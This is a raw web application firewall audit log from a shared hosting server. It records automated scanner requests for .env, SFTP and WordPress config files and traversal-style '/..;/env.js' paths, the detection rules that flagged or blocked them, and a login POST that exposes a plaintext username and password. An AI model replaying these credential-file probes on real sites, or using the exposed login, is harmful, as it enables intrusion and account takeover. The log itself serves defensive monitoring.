[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/aainag/js/js/luxury-mini-buses-coaches.php||SC:/home/digitaltheka/public_html/abhaytravelsindia/aaina/images||"] [severity "DEBUG"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281420182145 25039 (- - -) Stopwatch2: 1751281420182145 25039; combined=5681, p1=225, p2=5149, p3=0, p4=0, p5=306, sr=72, sw=1, l=0, gc=0 -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --b4e2b212-Z-- --580e3451-A-- [30/Jun/2025:16:33:41.459482 +0530] aGJvDTJ5JKn4EOxWiuppNgAAAFA 192.253.209.54 22077 192.168.74.40 443 --580e3451-B-- POST /sources/.env HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept-Encoding: * Accept: */* Connection: keep-alive Content-Length: 13 Content-Type: application/x-www-form-urlencoded --580e3451-C-- 0x%5B%5D=DTAB --580e3451-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --580e3451-H-- Message: Access denied with code 403 (phase 2). 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Action: Intercepted (phase 2) Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281421394183 65770 (- - -) Stopwatch2: 1751281421394183 65770; combined=2002, p1=162, p2=1479, p3=0, p4=0, p5=361, sr=61, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --580e3451-Z-- --4f6c325f-A-- [30/Jun/2025:16:33:41.824327 +0530] aGJvC14JvBqfS1k7uRVn5wAAAFI 123.187.240.242 34499 192.168.74.40 80 --4f6c325f-B-- GET / HTTP/1.1 Host: www.cesarpetcare.com User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Cache-Control: no-cache Connection: keep-alive, close Pragma: no-cache Upgrade-Insecure-Requests: 1 --4f6c325f-F-- HTTP/1.1 301 Moved Permanently X-Powered-By: PHP/8.1.18 X-Redirect-By: WordPress Location: https://cesarpetcare.com/ -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --fed7280b-Z-- --253aab15-A-- [30/Jun/2025:16:33:45.224480 +0530] aGJvEbpDbab8C7BhY4afwAAAAEw 192.253.209.54 36987 192.168.74.40 443 --253aab15-B-- GET /enviroments/.env HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:105.0) Gecko/20100101 Firefox/105.0 Accept-Encoding: * Accept: */* Connection: keep-alive --253aab15-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --253aab15-H-- Message: Access denied with code 403 (phase 2). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Action: Intercepted (phase 2) Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281425171087 53858 (- - -) Stopwatch2: 1751281425171087 53858; combined=903, p1=94, p2=616, p3=0, p4=0, p5=193, sr=86, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --253aab15-Z-- --7f91d256-A-- [30/Jun/2025:16:33:45.991869 +0530] aGJvEZ4tZwI9VhjyFFR7jwAAAEI 20.171.207.232 33346 192.168.74.40 443 --7f91d256-B-- GET /aaina/images/rajasthan-tours-from-udaipur/images/https/https/Rajasthan-Travel-Guides/festivals-calendar.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --7f91d256-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --7f91d256-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/Rajasthan-Travel-Guides/festivals-calendar.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/Rajasthan-Travel-Guides/festivals-calendar.php||SC:/home/digitaltheka/public_html/abhaytravelsindia/aaina/images||"] [severity "DEBUG"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281425970839 21324 (- - -) Stopwatch2: 1751281425970839 21324; combined=5100, p1=210, p2=4697, p3=0, p4=0, p5=193, sr=78, sw=0, l=0, gc=0 -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --801a5333-Z-- --c9edbd17-A-- [30/Jun/2025:16:33:47.203055 +0530] aGJvE7Ywjv2GcXOlZ0RWqQAAABE 192.253.209.107 63847 192.168.74.40 443 --c9edbd17-B-- POST /enviroments/.env HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0 Accept-Encoding: * Accept: */* Connection: keep-alive Content-Length: 13 Content-Type: application/x-www-form-urlencoded --c9edbd17-C-- 0x%5B%5D=DTAB --c9edbd17-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --c9edbd17-H-- Message: Access denied with code 403 (phase 2). 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Action: Intercepted (phase 2) Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281427108687 94692 (- - -) Stopwatch2: 1751281427108687 94692; combined=1537, p1=182, p2=1102, p3=0, p4=0, p5=252, sr=53, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --c9edbd17-Z-- --093e092e-A-- [30/Jun/2025:16:33:48.384332 +0530] aGJvFJ4tZwI9VhjyFFR7kQAAAEI 20.171.207.232 33346 192.168.74.40 443 --093e092e-B-- GET /aaina/images/rajasthan-tours-from-udaipur/images/https/https/Rajasthan-Travel-Guides/aainag/privacy-policy.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --093e092e-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --093e092e-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/Rajasthan-Travel-Guides/aainag/privacy-policy.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --978f972c-Z-- --ba4cff35-A-- [30/Jun/2025:16:34:31.796126 +0530] aGJvP8NDEoPcf0uXTmEWMQAAAEc 192.253.209.76 16423 192.168.74.40 443 --ba4cff35-B-- GET /.vscode/sftp.json HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept-Encoding: * Accept: */* Connection: keep-alive --ba4cff35-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --ba4cff35-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281471737185 59339 (- - -) Stopwatch2: 1751281471737185 59339; combined=4229, p1=91, p2=3952, p3=0, p4=0, p5=186, sr=53, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --ba4cff35-Z-- --7799e470-A-- [30/Jun/2025:16:34:33.072212 +0530] aGJvQX3h_Nu4NETt1nnNJQAAABI 192.253.209.54 28935 192.168.74.40 443 --7799e470-B-- GET /.json HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept-Encoding: * Accept: */* Connection: keep-alive --7799e470-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --7799e470-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281473026037 46446 (- - -) Stopwatch2: 1751281473026037 46446; combined=5214, p1=97, p2=4910, p3=0, p4=0, p5=207, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --7799e470-Z-- --f864e84a-A-- [30/Jun/2025:16:34:34.110353 +0530] aGJvPzJ5JKn4EOxWiuppRAAAAFA 51.89.207.180 41036 192.168.74.40 443 --f864e84a-B-- POST /wp-login.php HTTP/1.1 Host: thewizblog.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36 Accept-Encoding: gzip, deflate Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Connection: keep-alive Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 referer: https://thewizblog.com/wp-login.php Content-Length: 109 Content-Type: application/x-www-form-urlencoded --f864e84a-C-- log=marketingtech&pwd=RxBBJn34rEhgpWs&wp-submit=Log+In&redirect_to=https%3A%2F%2Fthewizblog.com%2Fwp-admin%2F --f864e84a-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-LiteSpeed-Tag: 9c0_L -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --5b591953-Z-- --580ec32b-A-- [30/Jun/2025:16:34:40.937379 +0530] aGJvSLzTKkleVdd1y6U4fwAAAAQ 192.253.209.104 15591 192.168.74.40 443 --580ec32b-B-- GET /_wpeprivate/config.json HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Accept-Encoding: * Accept: */* Connection: keep-alive --580ec32b-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --580ec32b-H-- Message: Access denied with code 403 (phase 2). 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/008_i360_wordpress.conf"] [line "1873"] [id "77350222"] [msg "IM360 WAF: Information disclosure in WPEngine plugin for WordPress||MV:/_wpeprivate/config.json||RSV:7.05||RS:0||T:APACHE||REQUEST_URI:/_wpeprivate/config.json||"] [severity "CRITICAL"] [tag "wp_core"] Action: Intercepted (phase 2) Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281480883188 54549 (- - -) Stopwatch2: 1751281480883188 54549; combined=2244, p1=80, p2=1977, p3=0, p4=0, p5=187, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --580ec32b-Z-- --9818ec13-A-- [30/Jun/2025:16:34:42.419019 +0530] aGJvSsw7AedGR9643eFB7wAAACU 57.141.0.17 54136 192.168.74.40 443 --9818ec13-B-- GET /Rajasthan-Travel-Guides/rajasthan-tours-from-agra/rajasthan-tours-from-jodhpur/rajasthan-tours-from-jaipur/rajasthan-tours-from-agra/rajasthan-tours-from-delhi/images/rajasthan-tours-from-ahmedabad/luxury-mini-buses-coaches.php HTTP/1.1 Accept: */* User-Agent: meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler) Host: abhaytravelsindia.digitaltheka.com Connection: keep-alive --9818ec13-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --9818ec13-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/Rajasthan-Travel-Guides/rajasthan-tours-from-agra/rajasthan-tours-from-jodhpur/rajasthan-tours-from-jaipur/rajasthan-tours-from-agra/rajasthan-tours-from-delhi/images/rajasthan-tours-from-ahmedabad/luxury-mini-buses-coaches.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/Rajasthan-Travel-Guides/rajasthan-tours-from-agra/rajasthan-tours-from-jodhpur/rajasthan-tours-from-jaipur/rajasthan-tours-from-agra/rajasthan-tours-from-delhi/images/rajasthan-tours-from-ahmedabad/luxury-mini-buses-coaches.php||SC:/home/digitaltheka/public_html/abhaytravelsindia/Rajasthan-Travel-Guides/rajasthan-tours-from-agra||"] [severity "DEBUG"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281482402251 16946 (- - -) Stopwatch2: 1751281482402251 16946; combined=3231, p1=171, p2=2903, p3=0, p4=0, p5=156, sr=72, sw=1, l=0, gc=0 -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --5e9d597b-Z-- --f98ccd52-A-- [30/Jun/2025:16:34:45.130110 +0530] aGJvTbzTKkleVdd1y6U4gAAAAAQ 192.253.209.64 44103 192.168.74.40 443 --f98ccd52-B-- GET /sftp-config.json HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept-Encoding: * Accept: */* Connection: keep-alive --f98ccd52-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --f98ccd52-H-- Message: Matched phrase "sftp-config.json" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/016_i360_monitor.conf"] [line "9"] [id "77316758"] [msg "IM360 WAF: Private file access||QS:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281485086903 43524 (- - -) Stopwatch2: 1751281485086903 43524; combined=4005, p1=104, p2=3755, p3=0, p4=0, p5=146, sr=54, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --f98ccd52-Z-- --37fc0015-A-- [30/Jun/2025:16:34:45.629096 +0530] aGJvSwms4GQJbNFEXqh5LwAAAFs 51.89.207.180 54896 192.168.74.40 443 --37fc0015-B-- GET /wp-login.php?redirect_to=https%3A%2F%2Fthewizblog.com%2Fwp-admin%2F&reauth=1 HTTP/1.1 Host: thewizblog.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36 Accept-Encoding: gzip, deflate Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Connection: keep-alive Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 referer: https://thewizblog.com/wp-login.php Cookie: wordpress_test_cookie=WP%20Cookie%20check; tk_ai=jetpack%3AU02TrCIbuSFWLgxZHVYFVnw1 --37fc0015-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-Frame-Options: SAMEORIGIN Referrer-Policy: strict-origin-when-cross-origin Set-Cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/; secure; HttpOnly Set-Cookie: wordpress_a9eb59679ad03aa872868369f11c068a=%20; expires=Sun, 30-Jun-2024 11:04:45 GMT; Max-Age=0; path=/wp-admin -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --1940ad5e-Z-- --7a30de7d-A-- [30/Jun/2025:16:35:37.156613 +0530] aGJvgQC_q2cBiBfjIEBntgAAABY 192.253.209.95 52241 192.168.74.40 443 --7a30de7d-B-- GET /..;/env.dev.js HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept-Encoding: * Accept: */* Connection: keep-alive --7a30de7d-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --7a30de7d-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281537139950 17008 (- - -) Stopwatch2: 1751281537139950 17008; combined=4880, p1=118, p2=4575, p3=0, p4=0, p5=187, sr=58, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --7a30de7d-Z-- --c268d168-A-- [30/Jun/2025:16:35:38.595191 +0530] aGJvgjX-tSYHdPnvNLtyLQAAACQ 192.253.209.79 52407 192.168.74.40 443 --c268d168-B-- GET /..;/env.development.js HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept-Encoding: * Accept: */* Connection: keep-alive --c268d168-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --c268d168-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281538574145 21380 (- - -) Stopwatch2: 1751281538574145 21380; combined=5518, p1=271, p2=5034, p3=0, p4=0, p5=213, sr=105, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --c268d168-Z-- --27142d35-A-- [30/Jun/2025:16:35:40.284716 +0530] aGJvhKvReB2qqJm9DDuGHwAAAAY 192.253.209.101 56579 192.168.74.40 443 --27142d35-B-- GET /..;/env.js HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept-Encoding: * Accept: */* Connection: keep-alive --27142d35-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --27142d35-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281540265807 19998 (- - -) Stopwatch2: 1751281540265807 19998; combined=5308, p1=119, p2=4952, p3=0, p4=0, p5=237, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --27142d35-Z-- --48806a3c-A-- [30/Jun/2025:16:35:41.671837 +0530] aGJvhbU6Mn-8rkg2zVU6hQAAAB0 192.253.209.96 6493 192.168.74.40 443 --48806a3c-B-- GET /..;/env.prod.js HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Accept-Encoding: * Accept: */* Connection: keep-alive --48806a3c-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --48806a3c-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281541646998 25337 (- - -) Stopwatch2: 1751281541646998 25337; combined=6821, p1=395, p2=6147, p3=0, p4=0, p5=278, sr=129, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --48806a3c-Z-- --eee53869-A-- [30/Jun/2025:16:35:43.098622 +0530] aGJvh1nkGKkpOZ5V2S9FygAAAGU 192.253.209.81 1905 192.168.74.40 443 --eee53869-B-- GET /..;/env.production.js HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept-Encoding: * Accept: */* Connection: keep-alive --eee53869-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --eee53869-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281543082953 16113 (- - -) Stopwatch2: 1751281543082953 16113; combined=3974, p1=93, p2=3690, p3=0, p4=0, p5=191, sr=55, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --eee53869-Z-- --f6afda17-A-- [30/Jun/2025:16:35:43.483337 +0530] aGJvhzSFvs-H_7nBXVD9BgAAAEo 57.141.0.11 47008 192.168.74.40 443 --f6afda17-B-- GET /rajasthan-tours-from-jaipur/rajasthan-tours-from-delhi/rajasthan-tours-from-jodhpur/rajasthan-tours-from-ahmedabad/rajasthan-tours-from-ahmedabad/images/Rajasthan-Travel-Guides/rajasthan-tours-from-jaipur/hotels-bikaner.php HTTP/1.1 Accept: */* User-Agent: meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler) Host: abhaytravelsindia.digitaltheka.com Connection: keep-alive --f6afda17-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --f6afda17-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file 